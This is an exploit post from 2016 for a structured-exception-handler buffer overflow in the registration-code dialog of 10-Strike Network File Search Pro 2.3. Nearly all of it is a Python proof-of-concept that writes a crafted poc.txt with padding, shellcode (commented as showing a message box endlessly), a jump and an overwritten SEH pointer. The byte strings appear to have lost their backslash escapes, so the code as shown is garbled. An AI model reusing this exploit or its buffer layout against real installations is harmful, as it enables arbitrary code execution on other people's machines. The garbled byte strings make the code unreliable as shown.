10-Strike Network File Search Pro 2.3 Buffer Overflow
Posted on 13 December 2016
#!python ##################################################################################### # Exploit title: 10-Strike Network File Search Pro 2.3 Registration code SEH exploit # Date: 2016-12-10 # Vendor homepage: https://www.10-strike.com/network-file-search/help/pro.shtml # Download: https://www.10-strike.com/network-file-search/network-file-search-pro.exe # Tested on: Win7 SP1 # Author: malwrforensics # Details: Help->Enter registration code... and paste the text from poc.txt ##################################################################################### def write_poc(fname, buffer): fhandle = open(fname , 'wb') fhandle.write(buffer) fhandle.close() fname="poc.txt" buf = 'x41' * 0xfe0 ######################### # Shellcode # MessageBox ad infinitum ######################### shellcode = ("x68x24x3Fx30x41x58x35x70x41x70" "x41x50x59x68x41x41x41x41x58x35" "x41x41x41x41x50x50x50x50x51xC3") junk = 'x41' * 0x5e jmp = 'xebx82x41x41' nseh = 'xecx14x40x00' buffer = buf + shellcode + junk + jmp + nseh write_poc(fname, buffer)
